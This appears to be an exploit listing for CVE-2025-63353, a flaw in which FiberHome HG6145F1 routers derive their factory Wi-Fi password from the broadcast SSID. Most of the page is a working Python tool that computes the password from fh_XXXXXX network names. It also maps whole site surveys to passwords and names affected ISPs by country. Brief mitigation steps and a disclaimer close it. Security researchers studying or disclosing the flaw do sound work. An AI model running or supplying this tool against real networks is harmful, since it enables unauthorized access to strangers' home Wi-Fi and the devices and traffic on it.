## https://sploitus.com/exploit?id=C7B319BE-584D-503D-8CAE-CDB51ACB79A6
## FiberHome Wi-Fi Password Predictor (CVE-2025-63353)
A Python utility designed for security auditing and proof-of-concept demonstration of the deterministic password generation flaw found in FiberHome HG6145F1 (RP4423) routers.
## 📋 Overview
This script exploits CVE-2025-63353, a critical vulnerability in which the factory-default WPA/WPA2 pre-shared key is derived arithmetically from the broadcast SSID. Anyone who can see the network name can compute the default password offline, with no interaction with the router or its users and no captured handshake.
The Vulnerability Logic:
The router derives the PSK from the SSID with a fixed formula. Taking the six hex digits after `fh_` as HEX_A and the six hex digits after `wlan` as HEX_B: HEX_A (from SSID) + HEX_B (from Password) = 0xFFFFFF. Equivalently, HEX_B is the 24-bit bitwise complement of HEX_A (each hex digit of the password is 15 minus the corresponding SSID digit), so the default password contains no secret beyond the SSID itself.
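The derivation above, as an added worked example in Python (this is not the project's `predictor.py`): it validates the `fh_XXXXXX` pattern, computes HEX_B as 0xFFFFFF minus HEX_A, inverts the relation so a leaked default PSK can be mapped back to its SSID, and runs the check over a constructed site-survey list. The function names, the survey list, and case-insensitive matching of the hex suffix are this example's own assumptions.

```python
import re

# Patterns taken from the page: SSID "fh_" + six hex digits, PSK "wlan" + six hex
# digits. Accepting either case is an assumption so survey data with mixed case
# still gets checked.
SSID_RE = re.compile(r"fh_([0-9A-Fa-f]{6})")
PSK_RE = re.compile(r"wlan([0-9A-Fa-f]{6})")
MASK24 = 0xFFFFFF  # HEX_A + HEX_B == 0xFFFFFF, i.e. HEX_B is the 24-bit complement


def ssid_to_hex_a(ssid: str) -> int:
    """Return HEX_A, the 24-bit value encoded in a default SSID, or raise ValueError."""
    m = SSID_RE.fullmatch(ssid.strip())
    if m is None:
        raise ValueError(f"{ssid!r} does not match the vulnerable fh_XXXXXX pattern")
    return int(m.group(1), 16)


def predict_password(ssid: str) -> str:
    """Derive the factory WPA/WPA2 PSK from a default SSID."""
    hex_a = ssid_to_hex_a(ssid)
    hex_b = MASK24 - hex_a  # same as hex_a ^ MASK24, since 0 <= hex_a <= MASK24
    assert hex_a + hex_b == MASK24  # the invariant the page states
    return f"wlan{hex_b:06x}"  # password suffix is lowercase hex


def ssid_from_password(psk: str) -> str:
    """Invert the relation: a leaked default PSK identifies the SSID it belongs to."""
    m = PSK_RE.fullmatch(psk.strip())
    if m is None:
        raise ValueError(f"{psk!r} does not match the wlanxxxxxx pattern")
    hex_b = int(m.group(1), 16)
    return f"fh_{MASK24 - hex_b:06X}"  # SSID suffix is uppercase hex


def explain(ssid: str) -> list[str]:
    """Verbose trace in the same shape as the page's -v output."""
    hex_a = ssid_to_hex_a(ssid)
    hex_b = MASK24 - hex_a
    return [
        f"[*] Input HEX_A: 0x{hex_a:06X}",
        f"[*] Calculation: 0xFFFFFF - 0x{hex_a:06X} = 0x{hex_b:06X}",
        f"[+] Predicted Password: wlan{hex_b:06x}",
    ]


def audit_survey(ssids: list[str]) -> dict[str, str]:
    """Map every SSID in a site survey that still carries the factory name to its PSK.
    Names that do not match (renamed networks, other vendors, non-hex suffixes) are skipped."""
    findings = {}
    for ssid in ssids:
        try:
            findings[ssid] = predict_password(ssid)
        except ValueError:
            continue
    return findings


# Constructed survey, not a real capture: the page's example, the two boundary
# values, a renamed network and a near-miss with a non-hex suffix.
SAMPLE_SURVEY = ["fh_96C3A0", "HomeNet-5G", "fh_000000", "fh_FFFFFF", "fh_ZZZZZZ"]

if __name__ == "__main__":
    for line in explain("fh_96C3A0"):
        print(line)
    for ssid, psk in audit_survey(SAMPLE_SURVEY).items():
        print(f"{ssid} -> {psk}")
```

The boundary cases are worth keeping in mind during an audit: `fh_000000` yields `wlanffffff` and `fh_FFFFFF` yields `wlan000000`, so the formula is a simple complement and there are only 16,777,216 possible factory passwords in total, each one fully determined by the SSID.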
## 🌍 Global Impact
FiberHome equipment is widely deployed by major Internet Service Providers (ISPs) across emerging markets. The script only applies to devices that still use the factory naming scheme:
* Vulnerable SSID Format: fh_XXXXXX, where XXXXXX is six uppercase hex digits (e.g., fh_96C3A0)
* Vulnerable Password Format: wlanxxxxxx, where xxxxxx is six lowercase hex digits
## Affected Regions and ISPs
* Algeria: Algérie Télécom (Idoom Fibre).
* Philippines: PLDT.
* India: BSNL and Airtel.
* Indonesia: Telkom Indonesia.
## 🚀 Usage
The script uses argparse to handle command-line inputs.
## Basic Command
```bash
python predictor.py fh_96C3A0
```
### Output:
```bash
[+] Predicted Password: wlan693c5f
```
## Verbose Mode
Use the -v flag to see the underlying hexadecimal subtraction.
```bash
python predictor.py fh_96C3A0 -v
```
### Output:
```bash
[*] Input HEX_A: 0x96C3A0
[*] Calculation: 0xFFFFFF - 0x96C3A0 = 0x693C5F
[+] Predicted Password: wlan693c5f
```
## 🛠️ Mitigation for Users
If your router is affected, your network is open to anyone within radio range until you take action:
1. Change your Wi-Fi Password: Do not keep the factory-default PSK, and change the SSID as well so the device no longer advertises itself as a candidate.
2. Disable WPS: This bug does not involve WPS, but WPS PIN attacks are a separate route to recovering the PSK even after you have changed it.
3. Use a Third-Party Router: Connect your own router behind the FiberHome ONT and disable the FiberHome Wi-Fi radio entirely, so the vulnerable default network is never broadcast.
## ⚠️ Legal Disclaimer
This information is provided for authorized security testing, network administration, and educational purposes.